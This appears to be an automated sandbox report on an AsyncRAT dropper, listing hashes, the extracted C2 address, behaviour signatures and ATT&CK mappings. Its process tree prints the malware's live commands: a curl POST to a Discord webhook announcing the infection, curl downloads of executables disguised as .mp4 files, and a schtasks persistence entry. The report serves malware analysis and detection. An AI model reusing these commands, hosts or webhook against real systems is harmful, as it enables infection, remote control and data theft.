Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-06-2024 08:39

General

  • Target

    Dropper.exe

  • Size

    88KB

  • MD5

    82f78463f2a3b53111a06367e6f9bfd7

  • SHA1

    ef55bb9f0648e2f0e4444c54db5fdc4ba002ad9f

  • SHA256

    3aed680e7ffde9f2f34681d7d60ee188862da9d48c7cace56060eebd6bbfb152

  • SHA512

    b781362092c869cd0b8fd5f92c8e2ece37e65a8b864e7127d5a8837ab06d1a08decc795bc7a4bfa58f362af5db26d1287f289155d7408a47b9ecf054419583c0

  • SSDEEP

    1536:hi8ujM8Nvd5hPSXvD1n70U4Ox+d9xHhGYL15b6tclMDgR:E84MMxSXpnJ6xfb6tYR

Score
10/10

Malware Config

Extracted

Family

asyncrat

Botnet

Default

C2

environmental-blank.gl.at.ply.gg:25944

Attributes
  • delay

    1

  • install

    true

  • install_file

    $77-aachost.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Async RAT payload 1 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 21 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 44 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Dropper.exe
    "C:\Users\Admin\AppData\Local\Temp\Dropper.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2080
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253986586673283103/CvnAbLIiYSc2d4NdsSOOo_z4TsnJT2JyuZLeKUKi_ejCvAa0imwn4KDGeajcvxpgCrSn" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4848
      • C:\Windows\SysWOW64\curl.exe
        curl "https://discord.com/api/webhooks/1253986586673283103/CvnAbLIiYSc2d4NdsSOOo_z4TsnJT2JyuZLeKUKi_ejCvAa0imwn4KDGeajcvxpgCrSn" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
        3⤵
          PID:4792
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/aachost.mp4?v=1719043456713 --output C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4564
        • C:\Windows\SysWOW64\curl.exe
          curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/aachost.mp4?v=1719043456713 --output C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
          3⤵
            PID:1188
        • C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
          "C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"
          2⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4184
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"' & exit
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:544
            • C:\Windows\system32\schtasks.exe
              schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"'
              4⤵
              • Scheduled Task/Job: Scheduled Task
              PID:2548
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp815B.tmp.bat""
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3248
            • C:\Windows\system32\timeout.exe
              timeout 3
              4⤵
              • Delays execution with timeout.exe
              PID:2436
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/sachost.mp4?v=1719043085712 --output C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4912
          • C:\Windows\SysWOW64\curl.exe
            curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/sachost.mp4?v=1719043085712 --output C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
            3⤵
              PID:4276
          • C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
            "C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"
            2⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:4404
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/%2477-penisware2.mp4?v=1719043121460 --output C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:4068
            • C:\Windows\SysWOW64\curl.exe
              curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/%2477-penisware2.mp4?v=1719043121460 --output C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
              3⤵
                PID:1864
            • C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
              "C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"
              2⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:4980
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/Install.mp4?v=1719043283499 --output C:\Users\Admin\AppData\Local\Temp\$77-install.exe
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:5032
              • C:\Windows\SysWOW64\curl.exe
                curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/Install.mp4?v=1719043283499 --output C:\Users\Admin\AppData\Local\Temp\$77-install.exe
                3⤵
                  PID:1868
            • C:\Windows\System32\rundll32.exe
              C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
              1⤵
                PID:4556

              Network

              MITRE ATT&CK Matrix ATT&CK v13

              Execution

              Scheduled Task/Job

              1
              T1053

              Scheduled Task

              1
              T1053.005

              Persistence

              Scheduled Task/Job

              1
              T1053

              Scheduled Task

              1
              T1053.005

              Privilege Escalation

              Scheduled Task/Job

              1
              T1053

              Scheduled Task

              1
              T1053.005

              Discovery

              Query Registry

              2
              T1012

              System Information Discovery

              2
              T1082

              Command and Control

              Web Service

              1
              T1102

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
                Filesize

                66KB

                MD5

                514d0abd73e992c2a1622795b33f17f4

                SHA1

                96740e82d7a119d808000783507bd92690584fe6

                SHA256

                b333ecc39a213f6ce650dd4af50d2d201ee6f80dea63ec98132220670469bf53

                SHA512

                4600baecf44a9cbc7b33fd02d1807628597c6ecc87aeb12b653f6e3a46c951fe9cd789e100d96df8c57b5d0446397c8a639f0c7ee8ef9395c172598ce8185bc8

              • C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
                Filesize

                256KB

                MD5

                18f497deffe88b6b2cff336a277aface

                SHA1

                4e1413241d3d3e4dbff399d179f8fd64f3ecd39e

                SHA256

                8133c3c1e5dde7c9b4d9d5c9a07e37b733fd0223fc9d035c3f386f034a434af5

                SHA512

                35c804ec73001fe66d57bd2fadc51cd399edbc2e550c4257f29aac5a24a9f9c030c582d50239dec41605801263fd5739444aa14f9683f99f726152cc1bb6920d

              • C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
                Filesize

                299KB

                MD5

                12d2d1f43b0ecf5a949adde54b1ffb65

                SHA1

                ad0529bc9102210f3616c7b626c37d6454d44033

                SHA256

                619b345f6803d45bcf20305efb3407a8ae26ba0aaffe38e7b5f31cb8c26101ef

                SHA512

                0a55fc91d0bc7e3123b16b012c70c15f731c3be1f8499c733cc994fcec43d8cdf6279e0b9eedda35035423c8891e076be374c512d6506d81e1f81802af25153f

              • C:\Users\Admin\AppData\Local\Temp\tmp815B.tmp.bat
                Filesize

                155B

                MD5

                d18965182157fee8347183c7ad862427

                SHA1

                f1d53d7eb51b900d8a64a88dce9f97bb69702773

                SHA256

                95798dc64ea9d985f441773f68767f03151c8eff61a908a0e709298a9561ac35

                SHA512

                7e749a2c20850cd7264f76880b3d34a2c74e4bd85e4a3cc4d290ad1f25e5005960d097e6dc00c9b4eff10192ad052241641f2a191b60226b9deca31f3097525b

              • memory/2080-0-0x000000007480E000-0x000000007480F000-memory.dmp
                Filesize

                4KB

              • memory/2080-1-0x0000000000C30000-0x0000000000C4C000-memory.dmp
                Filesize

                112KB

              • memory/2080-2-0x000000007480E000-0x000000007480F000-memory.dmp
                Filesize

                4KB

              • memory/4184-6-0x00000000000C0000-0x00000000000D6000-memory.dmp
                Filesize

                88KB

              • memory/4404-10-0x0000000000B50000-0x0000000000BA2000-memory.dmp
                Filesize

                328KB

              • memory/4980-14-0x00000000006C0000-0x0000000000706000-memory.dmp
                Filesize

                280KB

              • memory/4980-15-0x0000000002760000-0x0000000002766000-memory.dmp
                Filesize

                24KB